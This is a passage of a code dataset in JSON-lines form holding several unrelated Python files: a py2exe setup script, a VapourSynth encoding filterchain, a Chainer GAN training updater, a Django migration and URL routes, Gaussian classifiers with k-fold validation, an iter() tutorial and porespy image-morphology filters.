mod.replace(\"\\\\\",\".\")\r\n if not any([ex in mod for ex in exclude]):\r\n modules.append(mod)\r\n return modules\r\nmyservice = Target(modules=['EngageService'],\r\n cmdline_style='custom',\r\n description=\"Engage middleware\")\r\n\r\npy2exe_options = {'py2exe':{\r\n \"packages\":[\"engage_middleware\",\"sqlite3\",\"authenticator\",\"synchronizer\"],\r\n 'includes':[\r\n \"django\",\r\n \"email\",\r\n \"encodings\",\r\n \"engage_middleware\",\r\n \"engage_middleware.settings\",\r\n\r\n \"Crypto\",\r\n \"e89_security\",\r\n \"htmlentitydefs\",\r\n \"HTMLParser\",\r\n ],\r\n 'excludes':[\r\n 'django.conf.project_template',\r\n 'Tkinter',\r\n 'tk',\r\n 'ttk',\r\n 'tcl'\r\n ]\r\n }\r\n}\r\n\r\npy2exe_options[\"py2exe\"][\"includes\"] += find_django_modules(exclude=[\"django.test\",\"django.conf.project_template\"])\r\ndata_files = [(\"Microsoft.VC90.CRT\", glob(r'C:\\Users\\luccascorrea\\engage-middleware\\dlls\\*.*'))]\r\n\r\n\r\nsetup(\r\n\t\tdata_files=data_files,\r\n service = [myservice],\r\n options=py2exe_options)\r\n","sub_path":"setup_service.py","file_name":"setup_service.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"177309492","text":"from __future__ import annotations\n\nfrom typing import Any, Dict, Tuple\n\nimport vapoursynth as vs\nimport vsencode 
as vse\nfrom vardefunc import initialise_input\n\nfrom project_module import flt\n\nini = vse.generate.init_project()\n\ncore = vse.util.get_vs_core(reserve_core=ini.reserve_core)\n\nshader = vse.get_shader(\"FSRCNNX_x2_56-16-4-1.glsl\")\n\n\n# Sources\nSRC = vse.FileInfo(f\"{ini.bdmv_dir}/The Girl from the Other Side.mkv\", (24, -24))\n\n\nzones: Dict[Tuple[int, int], Dict[str, Any]] = { # Zones for the encoder\n}\n\n\n@initialise_input()\ndef filterchain(src: vs.VideoNode = SRC.clip_cut) -> vs.VideoNode | Tuple[vs.VideoNode, ...]:\n \"\"\"Main filterchain\"\"\"\n import havsfunc as haf\n import jvsfunc as jvf\n import vardefunc as vdf\n from vsmask.edge import FDOG\n from vsutil import get_y, insert_clip\n\n assert src.format\n\n smd = haf.SMDegrain(src, tr=3, thSAD=110, blksize=16)\n\n ret_smd = core.retinex.MSRCP(get_y(smd), sigma=[50, 200, 350], upper_thr=0.005)\n l_mask = FDOG().get_mask(ret_smd, lthr=102 << 8, hthr=102 << 8).std.Maximum().std.Minimum().std.Minimum()\n l_mask = l_mask.std.Minimum().std.Median().std.Convolution([1] * 9) # stolen from varde xd\n\n ccd_uv = jvf.ccd(smd, threshold=12)\n ccd_uv = core.std.MaskedMerge(ccd_uv, smd, l_mask)\n\n # Slight cleaning fun stuff\n credit = core.std.Binarize(get_y(src[100506])).std.Convolution([1] * 9)\n dft = core.dfttest.DFTTest(src, sigma=50)\n\n final_credit = ccd_uv[100465:]\n final_credit = core.std.MaskedMerge(final_credit, dft[100465:], credit)\n final_credit = insert_clip(ccd_uv, final_credit, 100465)\n\n deband = flt.masked_f3kdb(final_credit, rad=16, thr=[12, 6], grain=[32, 0])\n\n decs = vdf.noise.decsiz(deband, min_in=208 << 8, max_in=240 << 8)\n\n return decs\n\n\nFILTERED = filterchain()\n\n\nif __name__ == '__main__':\n vse.EncodeRunner(SRC, FILTERED).video('x264', '.settings/x264_settings', zones=zones) \\\n .audio('aac', all_tracks=True).mux('LightArrowsEXE@Kaleido').run()\nelif __name__ == '__vapoursynth__':\n if not isinstance(FILTERED, vs.VideoNode):\n raise vs.Error(f\"Input clip has multiple output nodes ({len(FILTERED)})! 
Please output a single clip\")\n    else:\n        vse.video.finalize_clip(FILTERED).set_output(0)\nelse:\n    SRC.clip_cut.set_output(0)\n\n    if not isinstance(FILTERED, vs.VideoNode):\n        for i, clip_filtered in enumerate(FILTERED, start=1):\n            clip_filtered.set_output(i)\n    else:\n        FILTERED.set_output(1)\n\n    for i, audio_node in enumerate(SRC.audios_cut, start=10):\n        audio_node.set_output(i)\n","sub_path":"[Kaleido-subs]/Movies & OVAs/Totsukuni no Shoujo (2022) [BD]/Totsukuni2022BD_01.py","file_name":"Totsukuni2022BD_01.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"158535887","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright (c) 2017 Yasunori Kudo\n\nfrom __future__ import print_function\n\nimport chainer\nimport chainer.functions as F\nfrom chainer import cuda\nfrom chainer import Variable\n\nimport numpy as np\n\n\nclass Updater(chainer.training.StandardUpdater):\n    def __init__(self, dcgan_accuracy_cap, *args, use_heuristic_loss, heuristic_loss_weight: float, **kwargs):\n        self.heuristic_loss_weight = heuristic_loss_weight\n        self.use_heuristic_loss = use_heuristic_loss\n        self.dcgan_accuracy_cap = dcgan_accuracy_cap\n        self.mode = kwargs.pop('mode')\n        self.batch_statistics = kwargs.pop('batch_statistics')\n        if self.mode not in ['dcgan', 'wgan', 'supervised']:\n            raise ValueError('mode must be one of dcgan, wgan or supervised')\n        self.gen, self.dis = kwargs.pop('models')\n        super(Updater, self).__init__(*args, **kwargs)\n\n    @staticmethod\n    def calculate_rotation(xy_real: chainer.Variable, z_pred: chainer.Variable) -> chainer.Variable:\n        xy_split = chainer.functions.split_axis(xy_real, xy_real.data.shape[3], axis=3)\n        z_split = chainer.functions.split_axis(z_pred, z_pred.data.shape[3], axis=3)\n\n        # Vector (a0, b0) in the zx-plane from the neck to the nose\n        a0 = z_split[9] - z_split[8]\n        b0 = xy_split[9 * 2] - xy_split[8 * 2]\n        n0 = chainer.functions.sqrt(a0 * a0 + b0 * b0)\n        # Vector (a1, b1) in the zx-plane from the right shoulder to the left shoulder\n        a1 = z_split[14] - z_split[11]\n        b1 = xy_split[14 * 2] - xy_split[11 * 2]\n        n1 = chainer.functions.sqrt(a1 * a1 + b1 * b1)\n        # Sine of the angle formed with the shoulder line\n        return (a0 * b1 - a1 * b0) / (n0 * n1)\n\n    @staticmethod\n    def calculate_heuristic_loss(xy_real: chainer.Variable, z_pred: chainer.Variable) -> chainer.Variable:\n        return chainer.functions.average(\n            chainer.functions.relu(- Updater.calculate_rotation(xy_real, z_pred))\n        )\n\n    def update_core(self):\n        gen_optimizer = self.get_optimizer('gen')\n        dis_optimizer = self.get_optimizer('dis')\n\n        gen, dis = self.gen, self.dis\n\n        batch = self.get_iterator('main').next()\n        batchsize = len(batch)\n        xy, xyz, scale = chainer.dataset.concat_examples(batch, self.device)\n\n        xy_real = Variable(xy)\n        z_pred = gen(xy_real)\n\n        # Random rotation.\n        theta = np.random.uniform(0, 2 * np.pi, len(xy)).astype(np.float32)\n        cos_theta = np.broadcast_to(np.cos(theta), z_pred.shape[::-1])\n        cos_theta = Variable(self.gen.xp.array(cos_theta.transpose(3, 2, 1, 0)))\n        sin_theta = np.broadcast_to(np.sin(theta), z_pred.shape[::-1])\n        sin_theta = Variable(self.gen.xp.array(sin_theta.transpose(3, 2, 1, 0)))\n\n        # 2D Projection.\n        x = xy_real[:, :, :, 0::2]\n        y = xy_real[:, :, :, 1::2]\n        xx = x * cos_theta + z_pred * sin_theta\n        xx = xx[:, :, :, :, None]\n        yy = y[:, :, :, :, None]\n        xy_fake = F.concat((xx, yy), axis=4)\n        xy_fake = F.reshape(xy_fake, (*y.shape[:3], -1))\n\n        if self.batch_statistics:\n            xy_real = concat_stat(xy_real)\n            xy_fake = concat_stat(xy_fake)\n\n        y_real = dis(xy_real)\n        y_fake = dis(xy_fake)\n        mse = F.mean_squared_error(z_pred, xyz[:, :, :, 
2::3])\n\n if self.mode == 'supervised':\n gen.cleargrads()\n mse.backward()\n gen_optimizer.update()\n chainer.report({'mse': mse}, gen)\n\n elif self.mode == 'dcgan':\n acc_dis_fake = F.binary_accuracy(y_fake, dis.xp.zeros(y_fake.data.shape, dtype=int))\n acc_dis_real = F.binary_accuracy(y_real, dis.xp.ones(y_real.data.shape, dtype=int))\n acc_dis = (acc_dis_fake + acc_dis_real) / 2\n\n loss_gen = F.sum(F.softplus(-y_fake)) / batchsize\n if self.use_heuristic_loss:\n loss_heuristic = self.calculate_heuristic_loss(xy_real=xy_real, z_pred=z_pred)\n loss_gen += loss_heuristic * self.heuristic_loss_weight\n chainer.report({'loss_heuristic': loss_heuristic}, gen)\n gen.cleargrads()\n if acc_dis.data >= (1 - self.dcgan_accuracy_cap):\n loss_gen.backward()\n gen_optimizer.update()\n xy_fake.unchain_backward()\n\n loss_dis = F.sum(F.softplus(-y_real)) / batchsize\n loss_dis += F.sum(F.softplus(y_fake)) / batchsize\n dis.cleargrads()\n if acc_dis.data <= self.dcgan_accuracy_cap:\n loss_dis.backward()\n dis_optimizer.update()\n\n chainer.report({'loss': loss_gen, 'mse': mse}, gen)\n chainer.report({'loss': loss_dis, 'acc': acc_dis, 'acc/fake': acc_dis_fake, 'acc/real': acc_dis_real}, dis)\n\n elif self.mode == 'wgan':\n y_real = F.sum(y_real) / batchsize\n y_fake = F.sum(y_fake) / batchsize\n\n wasserstein_distance = y_real - y_fake\n loss_dis = -wasserstein_distance\n loss_gen = -y_fake\n if self.use_heuristic_loss:\n loss_heuristic = self.calculate_heuristic_loss(xy_real=xy_real, z_pred=z_pred)\n loss_gen += loss_heuristic * self.heuristic_loss_weight\n chainer.report({'loss_heuristic': loss_heuristic}, gen)\n\n dis.cleargrads()\n loss_dis.backward()\n dis_optimizer.update()\n\n if self.iteration < 2500 and self.iteration % 100 == 0:\n gen.cleargrads()\n loss_gen.backward()\n gen_optimizer.update()\n\n if self.iteration > 2500 and self.iteration % 5 == 0:\n gen.cleargrads()\n loss_gen.backward()\n gen_optimizer.update()\n\n chainer.report({'loss': loss_gen, 'mse': mse}, gen)\n chainer.report({'loss': loss_dis}, dis)\n\n else:\n raise NotImplementedError\n\n\ndef concat_stat(x):\n mean = F.mean(x, axis=0)\n mean = F.concat([mean[None]] * x.shape[0], axis=0)\n variance = F.broadcast_to(F.mean((x - mean) * (x - mean)), x.shape)\n return F.concat((x, variance), axis=1)\n","sub_path":"projection_gan/pose/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"269882524","text":"import json\nimport logging\nimport os\nimport sys\nfrom logging import config\n\n\ndef configure_logging(path):\n if path and os.path.exists(path):\n with open(path, 'r') as c:\n config_json = json.load(c)\n config.dictConfig(config_json)\n else:\n logging.basicConfig(format='%(asctime)s %(name)s %(levelname)s %(message)s',\n stream=sys.stdout,\n level=logging.DEBUG)\n # set pyspark logger output to ERROR to keep python logs clean\n pyspark_log = logging.getLogger('py4j')\n pyspark_log.setLevel(logging.WARN)\n\n\nclass MissingDataWarning(Warning):\n \"\"\"Raise for the case in which output was produced but there was no data (all empty) for one of the days processed\"\"\"\n\nclass NoOutputException(Exception):\n \"\"\"Raise for the case in which no output was produced because of no data for all days processed\"\"\"\n\nclass DataScienceWarning(Warning):\n \"\"\"Raise for non-fatal errors that generate suspicious 
results\"\"\"","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"332962534","text":"from util.separator import separator_content\nimport sys\n\nif __name__ == \"__main__\":\n    \"\"\"\n    Problem\n    Your code uses a while loop to iteratively process data, because it needs\n    to call a function, or uses a test condition, that does not fit the usual\n    iteration pattern.\n\n    Can the loop be rewritten with an iterator?\n\n    Solution\n    A common IO-handling program may look like the following:\n    \"\"\"\n    separator_content()\n    CHUNK_SIZE = 8192\n\n    def process_data(data):\n        pass\n\n\n    def reader(s):\n        while True:\n            data = s.recv(CHUNK_SIZE)\n            if data == b'':\n                break\n            process_data(data)\n\n    \"\"\"\n    Such code can usually be replaced with iter():\n    \"\"\"\n\n    def reader2(s):\n        for chunk in iter(lambda: s.read(10), ''):\n            print(chunk)\n            # process_data(data)\n\n\n    \"\"\"\n    A little-known feature of the iter() function is that it accepts an\n    optional callable object and a sentinel (end) value as input arguments.\n    When used this way, it creates an iterator that keeps calling the\n    callable until the returned value equals the sentinel.\n\n    This particular approach works well for certain functions that get\n    called over and over, such as those involving I/O. For example, to read\n    data in chunks from a socket or a file, you normally have to call read()\n    or recv() repeatedly, each followed by an end-of-file test to decide\n    whether to stop. The recipe here combines both steps into a single\n    iter() call.\n\n    The lambda argument is there to create a callable that takes no\n    arguments, while still supplying the size argument to recv() or read().\n    \"\"\"\n    separator_content()\n    s = sys.argv[0]\n    with open(s,\n              encoding=\"utf-8\") as input_file:\n        reader2(input_file)\n","sub_path":"4__Iterators and generators/__16__Iterator instead of while infinite loop.py","file_name":"__16__Iterator instead of while infinite loop.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"332024875","text":"infile = \"C:\\\\Users\\\\Justyna\\\\Desktop\\\\Documents\\\\text_files\\\\computer\\\\Abacus.txt\"\noutfile = \"C:\\\\Users\\\\Justyna\\\\Desktop\\\\Documents\\\\text_files\\\\computer\\\\Abacus_swap.txt\"\n\nreplace_list = {\"use \": \"non \", \"the \" : \"some \", \"of \": \"any \"}\nfin = open(infile)\nfout = open(outfile, \"w+\")\nfor line in fin:\n    for word in replace_list:\n        line = line.replace(word, replace_list.get(word))\n    fout.write(line)\nfin.close()\nfout.close()","sub_path":"PythonI/zad10.py","file_name":"zad10.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"40084595","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('letters', '0007_auto_20150215_1626'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='lettertext',\n            name='addressee_is_organisation',\n            field=models.BooleanField(default=False),\n            preserve_default=False,\n        ),\n        migrations.AddField(\n            model_name='lettertext',\n            name='addressee_is_representative',\n            field=models.BooleanField(default=False),\n            preserve_default=False,\n        ),\n        migrations.AddField(\n            model_name='lettertext',\n            name='letter_title',\n            field=models.CharField(blank=True, null=True, max_length=100),\n            preserve_default=True,\n        ),\n        migrations.AddField(\n            model_name='lettertext',\n            name='sender_name',\n            field=models.CharField(default='Sender', max_length=100),\n            preserve_default=False,\n        ),\n        migrations.AddField(\n            model_name='lettertext',\n            name='sender_title',\n            field=models.CharField(default='Letter sender', max_length=100),\n            preserve_default=False,\n        ),\n        migrations.AlterField(\n            model_name='contenttemplate',\n            name='created',\n            field=models.DateTimeField(auto_now_add=True),\n            preserve_default=True,\n        ),\n        
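        # The AlterField operations above and below switch these
        # DateTimeFields to auto_now_add=True, so each timestamp is set
        # automatically, once, when the row is first created.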
migrations.AlterField(\n            model_name='contenttemplate',\n            name='end_time',\n            field=models.DateTimeField(auto_now_add=True),\n            preserve_default=True,\n        ),\n        migrations.AlterField(\n            model_name='contenttemplate',\n            name='start_time',\n            field=models.DateTimeField(auto_now_add=True),\n            preserve_default=True,\n        ),\n        migrations.AlterField(\n            model_name='lettertext',\n            name='date_sent',\n            field=models.DateTimeField(auto_now_add=True),\n            preserve_default=True,\n        ),\n    ]\n","sub_path":"api/correspondence/letters/migrations/0008_auto_20150215_1732.py","file_name":"0008_auto_20150215_1732.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"93842915","text":"from django.urls import path\r\nfrom . import views\r\n\r\napp_name = 'shop'\r\n\r\nurlpatterns = [\r\n    # NOTE: the converters were missing from the source; <int:year> follows\r\n    # from the view name, and <int:pk> is the conventional detail-view choice.\r\n    path('archives/<int:year>/', views.archives_year, name='archive_year'),\r\n    path('<int:pk>/', views.item_detail, name='item_detail'),\r\n    path('', views.item_list, name='item_list'),\r\n    path('new/', views.item_new, name='item_new'),\r\n]","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"395900981","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 13 15:10:43 2021\n\n\"\"\"\n\nimport numpy\nimport scipy\nfrom scipy import special\n\n\ndef getMu(D):\n    mu = []\n    for i in range(D.shape[0]):\n        mui = (1/(D[i].size))*sum(D[i])\n        mu.append(mui)\n    return mu\n\ndef colvec(vec):\n    return vec.reshape(vec.size,1)\n\ndef getSigma(D,mu):\n    mu = colvec(mu)\n    C=0\n    for i in range (D.shape[1]):\n        C=C+numpy.dot(D[:,i:i+1]-mu,(D[:,i:i+1] - mu ).T)\n\n    C= C/float(D.shape[1])\n    return C\n\ndef getSigmaI(D,mu):\n    mu = colvec(mu)\n    C=0\n    for i in range (D.shape[1]):\n        C=C+numpy.dot(D[:,i:i+1]-mu,(D[:,i:i+1] - mu ).T)\n\n    C= numpy.multiply(C/float(D.shape[1]),numpy.identity(D.shape[0]))\n    return C\n\ndef logpdf_GAU_ND(x, mu, C):\n    x = colvec(x)\n    lastTerm = 0.5*(numpy.dot(numpy.dot(((x-mu).T),(numpy.linalg.inv(C))),(x-mu)))\n    # log-determinant of C via slogdet, which is numerically more stable\n    # than taking log(det(C)) directly\n    det = numpy.linalg.slogdet(C)[1]\n    m = x.size\n    return (-m*0.5*numpy.log(numpy.pi*2)) - (0.5*det) - lastTerm\n\n\n\ndef MVG_classifier(DTR,LTR,DTE, LTE):\n    D0 = DTR[:, LTR==0]\n    D1 = DTR[:, LTR==1]\n    # D2 = DTR[:, LTR==2]\n    \n    mu0 = colvec(numpy.matrix(getMu(D0)))\n    mu1 = colvec(numpy.matrix(getMu(D1)))\n    #mu2 = colvec(numpy.matrix(getMu(D2)))\n    \n    sigma0 = getSigma(D0,mu0)\n    sigma1 = getSigma(D1,mu1)\n    #sigma2 = getSigma(D2,mu2)\n    \n    m_c = []\n    s_c = []\n    \n    m_c.append(mu0)\n    m_c.append(mu1)\n    #m_c.append(mu2)\n    s_c.append(sigma0)\n    s_c.append(sigma1)\n    #s_c.append(sigma2)\n    \n    S = numpy.zeros((2, DTE.shape[1]))\n    \n    for i in range(2):\n        for j, sample in enumerate(DTE.T):\n            S[i, j] = numpy.exp(logpdf_GAU_ND(sample, m_c[i], s_c[i]))\n    \n    SJoint = 1/2*S\n    SSum = SJoint.sum(axis=0)\n    SPost = SJoint/SSum\n    \n    Predictions = SPost.argmax(axis=0) == LTE\n    Predicted = Predictions.sum()\n    NotPredicted = Predictions.size - Predicted\n    acc = Predicted/Predictions.size\n    return Predicted, DTE.shape[1]\n\ndef MVG_log(DTR,LTR,DTE, LTE):\n    D0 = DTR[:, LTR==0]\n    D1 = DTR[:, LTR==1]\n    # D2 = DTR[:, LTR==2]\n    \n    mu0 = colvec(numpy.matrix(getMu(D0)))\n    mu1 = colvec(numpy.matrix(getMu(D1)))\n    #mu2 = colvec(numpy.matrix(getMu(D2)))\n    \n    sigma0 = getSigma(D0,mu0)\n    sigma1 = getSigma(D1,mu1)\n    #sigma2 = getSigma(D2,mu2)\n    \n    m_c = []\n    s_c = []\n    \n    
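    # Gather the per-class means and covariances estimated above; the
    # class-conditional log-densities S[i, j] = logpdf_GAU_ND(x_j, mu_i, C_i)
    # are then evaluated from these for every evaluation sample below.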
m_c.append(mu0)\n m_c.append(mu1)\n #m_c.append(mu2)\n s_c.append(sigma0)\n s_c.append(sigma1)\n #s_c.append(sigma2)\n\n S = numpy.zeros((2, DTE.shape[1]))\n\n for i in range(2):\n for j, sample in enumerate(DTE.T):\n S[i, j] = logpdf_GAU_ND(sample, m_c[i], s_c[i])\n\n SJoint = numpy.log(1/2) + S\n SSum = special.logsumexp(SJoint, axis=0)\n SPost = SJoint - SSum\n\n Predictions = SPost.argmax(axis=0) == LTE\n Predicted = Predictions.sum()\n NotPredicted = Predictions.size - Predicted\n acc = Predicted/Predictions.size\n\n return Predicted, DTE.shape[1]\n\ndef NaiveBayesGaussianClassifier(DTR, LTR, DTE, LTE):\n D0 = DTR[:, LTR==0]\n D1 = DTR[:, LTR==1]\n #D2 = DTR[:, LTR==2]\n \n mu0 = colvec(numpy.matrix(getMu(D0)))\n mu1 = colvec(numpy.matrix(getMu(D1)))\n #mu2 = colvec(numpy.matrix(getMu(D2)))\n \n sigma0 = getSigmaI(D0,mu0)\n sigma1 = getSigmaI(D1,mu1)\n #sigma2 = getSigmaI(D2,mu2)\n \n m_c = []\n s_c = []\n \n m_c.append(mu0)\n m_c.append(mu1)\n # m_c.append(mu2)\n s_c.append(sigma0)\n s_c.append(sigma1)\n #s_c.append(sigma2)\n\n S = numpy.zeros((2, DTE.shape[1]))\n\n for i in range(2):\n for j, sample in enumerate(DTE.T):\n S[i, j] = logpdf_GAU_ND(sample, m_c[i], s_c[i])\n\n SJoint = numpy.log(1/2) + S\n SSum = special.logsumexp(SJoint, axis=0)\n SPost = SJoint - SSum\n\n Predictions = SPost.argmax(axis=0) == LTE\n Predicted = Predictions.sum()\n NotPredicted = Predictions.size - Predicted\n acc = Predicted/Predictions.size\n\n return Predicted, DTE.shape[1]\n\ndef TiedCovarianceGaussianClassifier(DTR, LTR, DTE, LTE):\n D0 = DTR[:, LTR==0]\n D1 = DTR[:, LTR==1]\n # D2 = DTR[:, LTR==2]\n \n mu0 = colvec(numpy.matrix(getMu(D0)))\n mu1 = colvec(numpy.matrix(getMu(D1)))\n # mu2 = colvec(numpy.matrix(getMu(D2)))\n \n sigma0 = getSigmaI(D0,mu0)\n sigma1 = getSigmaI(D1,mu1)\n # sigma2 = getSigmaI(D2,mu2)\n \n m_c = []\n \n m_c.append(mu0)\n m_c.append(mu1)\n # m_c.append(mu2)\n \n SStar = (sigma0*D0.shape[1]+sigma1*D1.shape[1])/DTR.shape[1]\n\n S = numpy.zeros((2, DTE.shape[1]))\n\n for i in range(2):\n for j, sample in enumerate(DTE.T):\n S[i, j] = logpdf_GAU_ND(sample, m_c[i], SStar)\n\n SJoint = numpy.log(1/2) + S\n SSum = scipy.special.logsumexp(SJoint, axis=0)\n SPost = SJoint - SSum\n\n Predictions = SPost.argmax(axis=0) == LTE\n Predicted = Predictions.sum()\n NotPredicted = Predictions.size - Predicted\n acc = Predicted/Predictions.size\n\n return Predicted, DTE.shape[1]\n\ndef KFoldValidation(D,L):\n fileResults = open('Resultsfile.txt','w')\n fileResults.writelines('k \\t mvg \\t naivebayes \\t tiedCov' '\\n')\n K = 8 \n # N = int(D.shape[1]/K)\n classifiers = [(MVG_log, \"Multivariate Gaussian Classifier\"),(NaiveBayesGaussianClassifier, \"Naive Bayes\"),(TiedCovarianceGaussianClassifier, \"Tied Covariance\")]\n\n N = int(D.shape[1]/K)\n fileResults.writelines(str(K)+ ' \\t ') \n\n for j, (c, cstring) in enumerate(classifiers):\n nWrongPrediction = 0\n numpy.random.seed(j)\n indexes = numpy.random.permutation(D.shape[1])\n for i in range(K):\n \n idxTest = indexes[i*N:(i+1)*N]\n \n if i > 0:\n idxTrainLeft = indexes[0:i*N]\n elif (i+1) < K:\n idxTrainRight = indexes[(i+1)*N:]\n \n if i == 0:\n idxTrain = idxTrainRight\n elif i == K-1:\n idxTrain = idxTrainLeft\n else:\n idxTrain = numpy.hstack([idxTrainLeft, idxTrainRight])\n \n DTR = D[:, idxTrain]\n LTR = L[idxTrain]\n DTE = D[:, idxTest]\n LTE = L[idxTest]\n nCorrectPrediction, nSamples = c(DTR,LTR, DTE, LTE)\n nWrongPrediction += nSamples - nCorrectPrediction\n\n\n errorRate = nWrongPrediction/D.shape[1]\n accuracy = 1 - 
errorRate\n fileResults.writelines(str(round(accuracy*100, 1)) + '\\t') \n\n\n print(f\"{cstring} results:\\nAccuracy: {round(accuracy*100, 1)}%\\nError rate: {round(errorRate*100, 1)}%\\n\") \n\n fileResults.close()\n\n# kfold for different models\ndef KFoldValidationGenerativeModels(D,L):\n K = 8 \n # N = int(D.shape[1]/K)\n fileResults = open('ResultsfileGenerativeModelPCA.txt','w')\n fileResults.writelines('partition \\t mvg \\t mvglog \\t naive \\t tied \\n')\n\n N = int(D.shape[1]/K) \n\n numpy.random.seed(0)\n indexes = numpy.random.permutation(D.shape[1])\n\n # stored ac0curacies\n mvgPrecList=[]\n mvgLogPrecList=[]\n NaivePrecList=[]\n tiedPrecList=[]\n\n for i in range(K):\n\n idxTest = indexes[i*N:(i+1)*N]\n\n if i > 0:\n idxTrainLeft = indexes[0:i*N]\n elif (i+1) < K:\n idxTrainRight = indexes[(i+1)*N:]\n\n if i == 0:\n idxTrain = idxTrainRight\n elif i == K-1:\n idxTrain = idxTrainLeft\n else:\n idxTrain = numpy.hstack([idxTrainLeft, idxTrainRight])\n \n DTR = D[:, idxTrain]\n LTR = L[idxTrain]\n DTE = D[:, idxTest]\n LTE = L[idxTest]\n\n predictedMVG,shapeMVG = MVG_classifier(DTR,LTR,DTE,LTE)\n mvgPrec=predictedMVG/shapeMVG*100\n mvgPrecList.append(mvgPrec)\n\n\n predictedMVGLog,shapeMVGLog = MVG_log(DTR,LTR,DTE,LTE)\n mvgLogPrec=predictedMVGLog/shapeMVGLog*100\n mvgLogPrecList.append(mvgLogPrec)\n\n\n predictedNaive,shapeNaive = NaiveBayesGaussianClassifier(DTR,LTR,DTE,LTE)\n NaivePrec=predictedNaive/shapeNaive*100\n NaivePrecList.append(NaivePrec)\n\n\n predictedTied,shapeTied = TiedCovarianceGaussianClassifier(DTR,LTR,DTE,LTE)\n tiedPrec=predictedTied/shapeTied*100\n tiedPrecList.append(tiedPrec)\n\n \n fileResults.writelines(str(K)+\" \\t \"+str(mvgPrec)+ \" \\t\" + str(mvgLogPrec) +\"\\t\"+ str(NaivePrec) +\" \\t \"+str(tiedPrec) + \"\\n\")\n \n # compute the mean\n fileResults.writelines(\"means \\t \" + str(numpy.mean(mvgPrecList))+\" \\t \"+ str(numpy.mean(mvgLogPrecList))+\" \\t \"+str(numpy.mean(NaivePrecList))+\" \\t \"+str(numpy.mean(tiedPrecList))+\" \\n \")\n fileResults.close()\n\n","sub_path":"GenerativeModels.py","file_name":"GenerativeModels.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"351571704","text":"import scipy as sp\nimport scipy.ndimage as spim\nfrom skimage.morphology import ball, disk, square, cube\nfrom array_split import shape_split\nfrom scipy.signal import fftconvolve\n\n\ndef align_image_with_openpnm(im):\n r\"\"\"\n Rotates an image to agree with the coordinates used in OpenPNM. It is\n unclear why they are not in agreement to start with. This is necessary\n for overlaying the image and the network in Paraview.\n\n Parameters\n ----------\n im : ND-array\n The image to be rotated. Can be the Boolean image of the pore space or\n any other image of interest.\n\n Returns\n -------\n Returns the image rotated accordingly.\n \"\"\"\n if im.ndim == 2:\n im = (sp.swapaxes(im, 1, 0))\n im = im[-1::-1, :]\n elif im.ndim == 3:\n im = (sp.swapaxes(im, 2, 0))\n im = im[:, -1::-1, :]\n return im\n\n\ndef fftmorphology(im, strel, mode='opening'):\n r\"\"\"\n Perform morphological operations on binary images using fft approach for\n improved performance\n\n Parameters\n ----------\n im : nd-array\n The binary image on which to perform the morphological operation\n\n strel : nd-array\n The structuring element to use. Must have the same dims as ``im``.\n\n mode : string\n The type of operation to perform. 
Options are 'dilation', 'erosion',\n 'opening' and 'closing'.\n\n Notes\n -----\n This function uses ``scipy.signal.fftconvolve`` which *can* be more than\n 10x faster than the standard binary morphology operation in\n ``scipy.ndimage``. This speed up may not always be realized, depending\n on the scipy distribution used.\n\n Examples\n --------\n >>> import porespy as ps\n >>> from numpy import array_equal\n >>> import scipy.ndimage as spim\n >>> from skimage.morphology import disk\n >>> im = ps.generators.blobs(shape=[100, 100], porosity=0.8)\n\n Check that erosion, dilation, opening, and closing are all the same as\n the ``scipy.ndimage`` functions:\n\n >>> result = ps.filters.fftmorphology(im, strel=disk(5), mode='erosion')\n >>> temp = spim.binary_erosion(im, structure=disk(5))\n >>> array_equal(result, temp)\n True\n\n >>> result = ps.filters.fftmorphology(im, strel=disk(5), mode='dilation')\n >>> temp = spim.binary_dilation(im, structure=disk(5))\n >>> array_equal(result, temp)\n True\n\n >>> result = ps.filters.fftmorphology(im, strel=disk(5), mode='opening')\n >>> temp = spim.binary_opening(im, structure=disk(5))\n >>> array_equal(result, temp)\n True\n\n >>> result = ps.filters.fftmorphology(im, strel=disk(5), mode='closing')\n >>> temp = spim.binary_closing(im, structure=disk(5))\n >>> # This one does not work yet!!\n\n \"\"\"\n def erode(im, strel):\n t = fftconvolve(im, strel, mode='same') > (strel.sum() - 0.1)\n return t\n\n def dilate(im, strel):\n t = fftconvolve(im, strel, mode='same') > 0.1\n return t\n\n # The array must be padded with 0's so it works correctly at edges\n temp = sp.pad(array=im, pad_width=1, mode='constant', constant_values=0)\n # Perform erosion\n if mode.startswith('ero'):\n temp = erode(temp, strel)\n if mode.startswith('open'):\n temp = erode(temp, strel)\n temp = dilate(temp, strel)\n if mode.startswith('dila'):\n temp = dilate(temp, strel)\n if mode.startswith('clos'):\n temp = dilate(temp, strel)\n temp = erode(temp, strel)\n # Remove padding from resulting image\n if im.ndim == 2:\n result = temp[1:-1, 1:-1]\n elif im.ndim == 3:\n result = temp[1:-1, 1:-1, 1:-1]\n return result\n\n\ndef subdivide(im, divs=2):\n r\"\"\"\n Returns slices into an image describing the specified number of sub-arrays.\n This function is useful for performing operations on smaller 